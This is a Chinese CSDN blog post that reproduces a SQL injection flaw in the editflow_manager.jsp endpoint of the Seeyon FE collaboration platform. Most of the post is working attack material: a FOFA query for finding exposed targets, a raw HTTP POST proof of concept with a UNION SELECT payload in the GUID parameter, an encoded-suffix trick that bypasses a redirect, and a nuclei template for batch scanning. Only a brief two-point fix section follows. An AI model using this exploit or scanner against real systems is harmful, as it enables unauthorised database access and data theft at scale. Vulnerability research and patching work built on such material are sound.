致远互联FE协作办公平台 editflow_manager.jsp 存在SQL注入漏洞

最新推荐文章于 2024-07-27 13:31:57 发布
最新推荐文章于 2024-07-27 13:31:57 发布
阅读量465 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: java sql 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/luochen2436/article/details/135020685
版权

文章目录

产品简介

致远互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。平台旨在为企业提供数字化转型和升级的解决方案,特别是针对大中型政府和企业客户。平台的主要特点包括开放共享、多种协同应用、以及先进的技术支持。

漏洞概述

致远互联FE协作办公平台editflow_manager.jsp存在sql注入漏洞,由于GUID参数未过滤或者过滤不严格,允许攻击者利用漏洞获取数据库敏感。

指纹识别

fofa:

app="致远互联-FE"

在这里插入图片描述

漏洞利用

poc:

POST /sysform/003/editflow_manager.j%73p HTTP/1.1
Host: your_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=B2D63DD7EF3DFF0C26C68B223E295B04
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 49

option=2&GUID=-1%27+union+select+%40%40version--+

PS:需使用url编码后缀名来绕过302跳转
在这里插入图片描述
获取数据库版本
在这里插入图片描述
sqlmap验证
在这里插入图片描述
nuclei批量验证脚本

id: seeyon-fe-editflow_manager-sql

info:
  name: 致远互联FE协作办公平台 SQL注入漏洞
  author: 3tefanie
  severity: high
  description: 远互联FE协作办公平台editflow_manager.jsp存在sql注入漏洞,由于GUID参数未过滤或者过滤不严格,允许攻击者利用漏洞获取数据库敏感。

  metadata: 
    fofa-query: app="致远互联-FE"
    verified: true
    max-request: 1

http:
  - raw:
      - |
        POST /sysform/003/editflow_manager.j%73p HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15

        option=2&GUID=-1%27+union+select+@@version--+

        
    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains(body,"Microsoft SQL Server")

在这里插入图片描述

修复建议

1.查询代码使用预编译语句
2.部署Web应用防火墙,对数据库操作进行监控

【每个结局伤感的故事,都有个温暖的开头,每年的大雪隆冬,都是从春暖花开中走来。】

3tefanie丶zhou
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
互联FE协作办公平台 codeMoreWidget SQL注入致RCE漏洞复现
0xSec
06-29 654
互联FE协作办公平台 codeMoreWidget.jsp接口处存在SQL注入漏洞,未经授权攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。
互联FE协作办公平台 SQL注入漏洞复现
0xSec
12-08 1024
互联FE协作办公平台 editflow_manager.jsp、validate.jsp等接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
-Fe-codeMoreWidget接口存在SQL注入漏洞导致rce
weixin_43167326的博客
06-23 773
互联FE协作办公平台 codeMoreWidget 接口SQL注入致RCE漏洞,未经身份验证的程攻击者可利用此漏洞写入后门文件,执行任意命令,导致服务器被控。
互联FE协作办公平台 editflow_manager.jsp SQL注入漏洞
Keepb1ue的博客
12-25 2046
互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。致互联FE协作办公平台editflow_manager存在sql注入漏洞,攻击者可以获得敏感信息。2.部署Web应用防火墙,对数据库操作进行监控。app=“致互联-FE”1.升级至系统最新版本。
漏洞复现】致互联FE协作办公平台——SQL注入
LongL_GuYu的博客
06-30 439
互联FE协作办公平台是一个专注于协同管理软件领域的数智化运营平台及云服务提供商。其ncsubjass.jsp接口处存在SQL注入漏洞,恶意攻击者可能会向数据库发送构造的恶意SQL查询语句。
漏洞复现】致互联FE协作办公平台 ncsubjass SQL注入
siu~
06-18 351
互联FE协作办公平台 ncsubjass.jsp接口处存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息,深入利用可获取服务器权限。
EDITFLOW 固体流量检测传感器.pdf
10-11
EDITFLOW 固体流量检测传感器pdf,EDITFLOW 固体流量检测传感器
【复现】FE企业运营管理平台 SQL注入漏洞_59
fushuang333的博客
02-26 1101
【复现】FE企业运营管理平台 SQL注入漏洞​,攻击者未经授权可以访问数据库中的数据,盗取用户的隐私以及个人信息,造成用户的信息泄露。
漏洞复现】飞企互联-FE企业运营管理平台-publicData-sql注入
知黑而守白
01-10 326
飞企互联FE企业运营管理平台是一款基于先进技术的云工作台,采用云计算、智能化、大数据、物联网和移动互联网等技术,以支撑企业的数字化转型。飞企互联FE企业运营管理平台中的publicData接口存在SQL注入漏洞,该漏洞使得攻击者可以通过构造精心设计的恶意SQL语句,成功执行未经授权的数据库操作。此漏洞可能导致敏感信息泄露、数据库被篡改或其他安全风险。
飞企互联FE业务协作平台 ShowImageServlet 文件读取漏洞复现
0xSec
12-21 1050
飞企互联 FE 业务协作平台ShowImageServlet接口存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 774
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的程访问权限或者破坏系统,对服务器造成极大的安全隐患。
golang 接口
m0_70982551的博客
07-24 869
接口定义了一组方法,这些方法没有具体的实现。接口类型的变量可以存储任何实现了这些方法的类型的值。// 更多方法...在Go语言中,接口值是指存储了实现某个接口的具体类型值的变量。接口值由两部分组成:1.动态类型:这是接口值当前存储的实际类型。2.动态值:这是实际存储的值,该值必须实现了接口中定义的所有方法。
Swagger使用Map接受参数时,页面如何显示具体参数及说
a1058926697的博客
07-26 456
后端使用Map接受参数,要求在swagger页面上显示具体的参数名称、类型及说明。当Map接受参数数量少时,可以使用Swagger自带的注解。自定义注解 @ApiGlobalModel。编写处理注解对应的插件。
springboot之自动装配
weixin_50153914的博客
07-23 549
Spring Boot 通过一系列注解和条件配置实现了自动装配机制,使得开发者无需手动配置大量的 XML 文件或 Java 配置类。自动配置机制利用文件中的自动配置类,并结合条件注解和组件扫描,实现了灵活且强大的自动装配功能。这样,开发者可以专注于业务逻辑的实现,而无需处理繁琐的配置细节。
Java的@DateTimeFormat注解与@JsonFormat注解的使用对比
最新发布
訾博(ZiBo)的博客
07-27 539
在Spring和Jackson框架中,日期和时间格式化是一个常见需求。注解主要用于Spring的表单绑定,而注解则用于Jackson的JSON序列化和反序列化。了解这两个注解的使用场景和方法,可以帮助开发者更高效地处理日期和时间。和是处理日期和时间格式化的两个重要注解。主要用于Spring MVC的请求参数绑定,而主要用于Jackson的JSON序列化和反序列化。了解它们的使用场景和功能,可以帮助开发者更高效地处理日期和时间格式化需求。通过本文的介绍,希望读者能够更清晰地理解和。
Java代码基础算法练习-数的特性-2024.07.25
Sakurapaid的博客
07-25 344
小A喜欢两种性质都成立的数字,小B喜欢至少符合一种性质的数字,小C喜欢不符合这两种性质的 数字。给出一个数字,请输出三个人是否喜欢这个数字。如果喜欢输出1,否则输出0,用空格分隔。输入数字 num,先定义三个整型代表三个人的喜欢与否,先默认设为 0。之后判断num对于性质1、2的条件,分别用 boolen 类型标识。对于每个整型进行判断,是否改为 1 代表喜欢。性质2:大于4且不大于12;
Java修炼 2024.7.26 0:24
2301_80011650的博客
07-26 397
问题:编写一个方法,找出一个数组中的众数(出现次数超过数组长度一半的元素)。例如,输入 [2, 2, 1, 1, 2],输出 2。编写一个方法,找出一个整数数组中的第二大元素。例如,输入 [3, 5, 1, 8, 7],输出 7。例如,输入 5,输出 5。问题:编写一个方法,将给定的字符串逆转。问题:使用数组实现栈,并提供基本操作(push、pop、peek、isEmpty)。问题:实现一个单向链表,并提供基本的操作(添加、删除、查找元素)。问题:编写一个方法来查找一个给定字符串的所有子串。
学习笔记---java篇(0723)
m0_70630166的博客
07-23 835
java、数据类型、循环、选择等
SSM框架整合——常用方式整合SSM框架(三)Spring和MyBatis整合
PAP
07-26 168
SSM框架整合——常用方式整合SSM框架(三)Spring和MyBatis整合
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值